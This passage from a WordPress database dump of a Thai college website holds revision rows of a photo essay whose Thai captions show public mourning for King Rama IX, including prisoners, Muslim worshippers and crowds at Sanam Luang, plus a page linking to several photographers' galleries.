/>\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชนได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้ แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า”ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4545\" src=\"/wp-content/uploads/2018/11/92-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังในทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี จํานวน 3,617 คน ร่วมกันแสดงออกซึ่งความจงรักภักดีและความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการขับร้อง 9 บทเพลงถวายพ่อและการแปรอักษรเป็นรูปเลข 9 โดยมี นายณรงค์ศักดิ์ สมพัศ ผู้อํานวยการทัณฑสถาน ร่วมขับร้องและเป็นประธานในการจัดกิจกรรม</p>\r\n<img class=\"aligncenter size-large wp-image-4546\" src=\"/wp-content/uploads/2018/11/93-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชหลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวงด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n<img class=\"aligncenter size-large wp-image-4547\" src=\"/wp-content/uploads/2018/11/95-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวมุสลิมกําลังอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิม ที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>', 'ภาพถ่าย โดย เริงชัย คงเมือง', '', 'publish', 'closed', 'closed', '', '%e0%b8%a0%e0%b8%b2%e0%b8%9e%e0%b8%96%e0%b9%88%e0%b8%b2%e0%b8%a2-%e0%b9%82%e0%b8%94%e0%b8%a2-%e0%b9%80%e0%b8%a3%e0%b8%b4%e0%b8%87%e0%b8%8a%e0%b8%b1%e0%b8%a2-%e0%b8%84%e0%b8%87%e0%b9%80%e0%b8%a1', '', '', '2018-11-16 10:15:20', '2018-11-16 03:15:20', '', 0, 'http://www.technicrayong.ac.th/?page_id=4591', 0, 'page', '', 0),
(4592, 3, '2018-11-16 09:33:26', '2018-11-16 02:33:26', '<img class=\"aligncenter size-large wp-image-4536\" src=\"/wp-content/uploads/2018/11/8-Roengchai-Kongmuang-copy-683x1024.jpg\" alt=\"\" width=\"640\" height=\"960\" />\r\n<p style=\"text-align: center;\">คุณแม่ชาวมุสลิมชี้ชวนให้ลูกสาวอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิมที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4537\" src=\"/wp-content/uploads/2018/11/20-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชน ได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า” ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4538\" src=\"/wp-content/uploads/2018/11/39-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังซึ่งเป็นนักดนตรีกําลังเป่าทูบาร่วมกับเพื่อนร่วมวงคนอื่น ๆ ในกิจกรรมที่จัดขึ้น ณ ทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4539\" src=\"/wp-content/uploads/2018/11/49-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช หลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวง ด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รูปถ่ายแทนความคิดถึง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4540\" src=\"/wp-content/uploads/2018/11/58-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนนําพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชติดตัวมาจากบ้าน เพื่อรอรับเสด็จพระบรมวงศานุวงศ์ที่เสด็จมาประกอบพิธีทางศาสนา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สะพานเบลีย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4541\" src=\"/wp-content/uploads/2018/11/65-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เมื่อเส้นทางสัญจรปกติไม่สามารถรองรับประชาชนจํานวนมากที่เข้ามาบริเวณสนามหลวงได้รัฐบาลจึงสั่งให้มีการสร้างสะพานชั่วคราวข้ามคลองหลอดขึ้น 2 จุด คือ บริเวณด้านหน้าโรงแรมรัตนโกสินทร์และด้านหลังกระทรวงกลาโหมเป็น “สะพานเบลีย์” ที่คิดค้นขึ้นโดยวิศวกรโยธาชาวอังกฤษ เซอร์โดนัลด์ โคลแมน เบลีย์ (Sir Donald Coleman Bailey) ในช่วงสงครามโลกครั้งที่ 2</p>\r\n<img class=\"aligncenter size-large wp-image-4542\" src=\"/wp-content/uploads/2018/11/69-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวต่างชาตินําดอกไม้มาถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9 ร่วมกับภรรยาและเพื่อนชาวไทย ณ บริเวณหน้าวัดพระศรีรัตนศาสดาราม</p>\r\n<img class=\"aligncenter size-large wp-image-4543\" src=\"/wp-content/uploads/2018/11/78-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ปรางจันทร์ แซ่เฮ้ง แม่ค้าขายก๋วยเตี๋ยวเรือที่คลอง 7 จังหวัดปทุมธานี หลั่งนํ้าตาอย่างซาบซึ้งใจเมื่อพูดถึงวันที่ให้ศิลปินอิสระนําภาพในหลวงรัชกาลที่ 9 มาติดไว้ที่ผนังหน้าบ้านที่ครอบครัวของเธออาศัยมาตั้งแต่รุ่นปู่ ย่า</p>\r\n<img class=\"aligncenter size-large wp-image-4544\" src=\"/wp-content/uploads/2018/11/80-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชนได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้ แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า”ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4545\" src=\"/wp-content/uploads/2018/11/92-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังในทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี จํานวน 3,617 คน ร่วมกันแสดงออกซึ่งความจงรักภักดีและความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการขับร้อง 9 บทเพลงถวายพ่อและการแปรอักษรเป็นรูปเลข 9 โดยมี นายณรงค์ศักดิ์ สมพัศ ผู้อํานวยการทัณฑสถาน ร่วมขับร้องและเป็นประธานในการจัดกิจกรรม</p>\r\n<img class=\"aligncenter size-large wp-image-4546\" src=\"/wp-content/uploads/2018/11/93-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชหลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวงด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n<img class=\"aligncenter size-large wp-image-4547\" src=\"/wp-content/uploads/2018/11/95-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n ', 'ภาพถ่าย โดย เริงชัย คงเมือง', '', 'inherit', 'closed', 'closed', '', '4591-revision-v1', '', '', '2018-11-16 09:33:26', '2018-11-16 02:33:26', '', 4591, 'http://www.technicrayong.ac.th/4591-revision-v1/', 0, 'revision', '', 0),
(4593, 3, '2018-11-16 10:15:20', '2018-11-16 03:15:20', '<img class=\"aligncenter size-large wp-image-4536\" src=\"/wp-content/uploads/2018/11/8-Roengchai-Kongmuang-copy-683x1024.jpg\" alt=\"\" width=\"640\" height=\"960\" />\r\n<p style=\"text-align: center;\">คุณแม่ชาวมุสลิมชี้ชวนให้ลูกสาวอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิมที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4537\" src=\"/wp-content/uploads/2018/11/20-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชน ได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า” ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4538\" src=\"/wp-content/uploads/2018/11/39-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังซึ่งเป็นนักดนตรีกําลังเป่าทูบาร่วมกับเพื่อนร่วมวงคนอื่น ๆ ในกิจกรรมที่จัดขึ้น ณ ทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4539\" src=\"/wp-content/uploads/2018/11/49-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช หลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวง ด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รูปถ่ายแทนความคิดถึง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4540\" src=\"/wp-content/uploads/2018/11/58-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนนําพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชติดตัวมาจากบ้าน เพื่อรอรับเสด็จพระบรมวงศานุวงศ์ที่เสด็จมาประกอบพิธีทางศาสนา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สะพานเบลีย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4541\" src=\"/wp-content/uploads/2018/11/65-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เมื่อเส้นทางสัญจรปกติไม่สามารถรองรับประชาชนจํานวนมากที่เข้ามาบริเวณสนามหลวงได้รัฐบาลจึงสั่งให้มีการสร้างสะพานชั่วคราวข้ามคลองหลอดขึ้น 2 จุด คือ บริเวณด้านหน้าโรงแรมรัตนโกสินทร์และด้านหลังกระทรวงกลาโหมเป็น “สะพานเบลีย์” ที่คิดค้นขึ้นโดยวิศวกรโยธาชาวอังกฤษ เซอร์โดนัลด์ โคลแมน เบลีย์ (Sir Donald Coleman Bailey) ในช่วงสงครามโลกครั้งที่ 2</p>\r\n<img class=\"aligncenter size-large wp-image-4542\" src=\"/wp-content/uploads/2018/11/69-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวต่างชาตินําดอกไม้มาถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9 ร่วมกับภรรยาและเพื่อนชาวไทย ณ บริเวณหน้าวัดพระศรีรัตนศาสดาราม</p>\r\n<img class=\"aligncenter size-large wp-image-4543\" src=\"/wp-content/uploads/2018/11/78-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ปรางจันทร์ แซ่เฮ้ง แม่ค้าขายก๋วยเตี๋ยวเรือที่คลอง 7 จังหวัดปทุมธานี หลั่งนํ้าตาอย่างซาบซึ้งใจเมื่อพูดถึงวันที่ให้ศิลปินอิสระนําภาพในหลวงรัชกาลที่ 9 มาติดไว้ที่ผนังหน้าบ้านที่ครอบครัวของเธออาศัยมาตั้งแต่รุ่นปู่ ย่า</p>\r\n<img class=\"aligncenter size-large wp-image-4544\" src=\"/wp-content/uploads/2018/11/80-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชนได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้ แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า”ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4545\" src=\"/wp-content/uploads/2018/11/92-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังในทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี จํานวน 3,617 คน ร่วมกันแสดงออกซึ่งความจงรักภักดีและความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการขับร้อง 9 บทเพลงถวายพ่อและการแปรอักษรเป็นรูปเลข 9 โดยมี นายณรงค์ศักดิ์ สมพัศ ผู้อํานวยการทัณฑสถาน ร่วมขับร้องและเป็นประธานในการจัดกิจกรรม</p>\r\n<img class=\"aligncenter size-large wp-image-4546\" src=\"/wp-content/uploads/2018/11/93-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชหลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวงด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n<img class=\"aligncenter size-large wp-image-4547\" src=\"/wp-content/uploads/2018/11/95-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวมุสลิมกําลังอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิม ที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>', 'ภาพถ่าย โดย เริงชัย คงเมือง', '', 'inherit', 'closed', 'closed', '', '4591-revision-v1', '', '', '2018-11-16 10:15:20', '2018-11-16 03:15:20', '', 4591, 'http://www.technicrayong.ac.th/4591-revision-v1/', 0, 'revision', '', 0),
(4594, 3, '2018-11-16 10:15:35', '2018-11-16 03:15:35', '<img class=\"aligncenter size-large wp-image-4536\" src=\"/wp-content/uploads/2018/11/8-Roengchai-Kongmuang-copy-683x1024.jpg\" alt=\"\" width=\"640\" height=\"960\" />\r\n<p style=\"text-align: center;\">คุณแม่ชาวมุสลิมชี้ชวนให้ลูกสาวอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิมที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4537\" src=\"/wp-content/uploads/2018/11/20-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชน ได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า” ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4538\" src=\"/wp-content/uploads/2018/11/39-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังซึ่งเป็นนักดนตรีกําลังเป่าทูบาร่วมกับเพื่อนร่วมวงคนอื่น ๆ ในกิจกรรมที่จัดขึ้น ณ ทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4539\" src=\"/wp-content/uploads/2018/11/49-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช หลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวง ด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รูปถ่ายแทนความคิดถึง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4540\" src=\"/wp-content/uploads/2018/11/58-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนนําพระบรมฉายาลักษณ์ของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชติดตัวมาจากบ้าน เพื่อรอรับเสด็จพระบรมวงศานุวงศ์ที่เสด็จมาประกอบพิธีทางศาสนา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สะพานเบลีย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4541\" src=\"/wp-content/uploads/2018/11/65-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เมื่อเส้นทางสัญจรปกติไม่สามารถรองรับประชาชนจํานวนมากที่เข้ามาบริเวณสนามหลวงได้รัฐบาลจึงสั่งให้มีการสร้างสะพานชั่วคราวข้ามคลองหลอดขึ้น 2 จุด คือ บริเวณด้านหน้าโรงแรมรัตนโกสินทร์และด้านหลังกระทรวงกลาโหมเป็น “สะพานเบลีย์” ที่คิดค้นขึ้นโดยวิศวกรโยธาชาวอังกฤษ เซอร์โดนัลด์ โคลแมน เบลีย์ (Sir Donald Coleman Bailey) ในช่วงสงครามโลกครั้งที่ 2</p>\r\n<img class=\"aligncenter size-large wp-image-4542\" src=\"/wp-content/uploads/2018/11/69-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวต่างชาตินําดอกไม้มาถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9 ร่วมกับภรรยาและเพื่อนชาวไทย ณ บริเวณหน้าวัดพระศรีรัตนศาสดาราม</p>\r\n<img class=\"aligncenter size-large wp-image-4543\" src=\"/wp-content/uploads/2018/11/78-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ปรางจันทร์ แซ่เฮ้ง แม่ค้าขายก๋วยเตี๋ยวเรือที่คลอง 7 จังหวัดปทุมธานี หลั่งนํ้าตาอย่างซาบซึ้งใจเมื่อพูดถึงวันที่ให้ศิลปินอิสระนําภาพในหลวงรัชกาลที่ 9 มาติดไว้ที่ผนังหน้าบ้านที่ครอบครัวของเธออาศัยมาตั้งแต่รุ่นปู่ ย่า</p>\r\n<img class=\"aligncenter size-large wp-image-4544\" src=\"/wp-content/uploads/2018/11/80-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม ร่วมกับเครือข่ายศิลปะและวัฒนธรรม จังหวัดปทุมธานี อาทิ ศิลปินพื้นบ้าน สถาบันการศึกษาในจังหวัดปทุมธานี ข้าราชการ และประชาชนได้จัดงานรวมใจเครือข่ายศิลปะและวัฒนธรรม เพื่อแสดงความจงรักภักดีและรําลึกพระมหากรุณาธิคุณอย่างหาที่สุดมิได้ แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ผู้เป็น “อัครศิลปินเหนือเกล้า”ณ หออัครศิลปิน อําเภอคลองหลวง จังหวัดปทุมธานี</p>\r\n<img class=\"aligncenter size-large wp-image-4545\" src=\"/wp-content/uploads/2018/11/92-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังในทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี จํานวน 3,617 คน ร่วมกันแสดงออกซึ่งความจงรักภักดีและความอาลัยต่อในหลวงรัชกาลที่ 9 ด้วยการขับร้อง 9 บทเพลงถวายพ่อและการแปรอักษรเป็นรูปเลข 9 โดยมี นายณรงค์ศักดิ์ สมพัศ ผู้อํานวยการทัณฑสถาน ร่วมขับร้องและเป็นประธานในการจัดกิจกรรม</p>\r\n<img class=\"aligncenter size-large wp-image-4546\" src=\"/wp-content/uploads/2018/11/93-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ผู้ต้องขังชายจากทัณฑสถานวัยหนุ่มกลาง จังหวัดปทุมธานี ก้มกราบพระบรมฉายาลักษณ์พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชหลังจากร่วมกิจกรรมแปรอักษรเป็นรูปเลข ๙ และขับร้อง 9 บทเพลงถวายพ่อหลวงด้วยสํานึกในพระมหากรุณาธิคุณหาที่สุดมิได้</p>\r\n<img class=\"aligncenter size-large wp-image-4547\" src=\"/wp-content/uploads/2018/11/95-Roengchai-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชาวมุสลิมกําลังอ่านเนื้อหาในวารสารฉบับพิเศษ ที่แจกในงานร่วมถวายความอาลัยของพี่น้องชาวมุสลิม ที่ถูกจัดขึ้นที่มัสยิดกลางแห่งชาติ กรุงเทพมหานคร</p>', 'ภาพถ่าย โดย เริงชัย คงเมือง', '', 'inherit', 'closed', 'closed', '', '4591-autosave-v1', '', '', '2018-11-16 10:15:35', '2018-11-16 03:15:35', '', 4591, 'http://www.technicrayong.ac.th/4591-autosave-v1/', 0, 'revision', '', 0),
(4595, 3, '2018-11-16 10:16:30', '2018-11-16 03:16:30', 'https://youtu.be/xrNi-56jrzQ\r\n\r\nhttps://www.youtube.com/watch?v=QO9X6zaqiWA\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-จันทร์กลาง-ก\"><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/ภาพถ่าย-โดย-เริงชัย-คงเม\"><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></a></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></h3>', '๑๐๐ วัน เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-16 10:16:30', '2018-11-16 03:16:30', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4596, 3, '2018-11-16 10:37:24', '2018-11-16 03:37:24', '<img class=\"aligncenter size-large wp-image-4548\" src=\"/wp-content/uploads/2018/11/10-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">หมอลําทั่วอีสานรวมตัวกันเพื่อถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ จังหวัดขอนแก่น โดยทุกคนสวมเสื้อผ้าชุดหมอลําที่มีการคาดด้วยผ้าดํา และประดับเข็มกลัดตัวเลข ๙</p>\r\n<img class=\"aligncenter size-large wp-image-4549\" src=\"/wp-content/uploads/2018/11/13-Roengrit-Kongmuang-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ในงานมหกรรมว่าวประจําปี พ.ศ. 25 60 จังหวัดบุรีรัมย์ 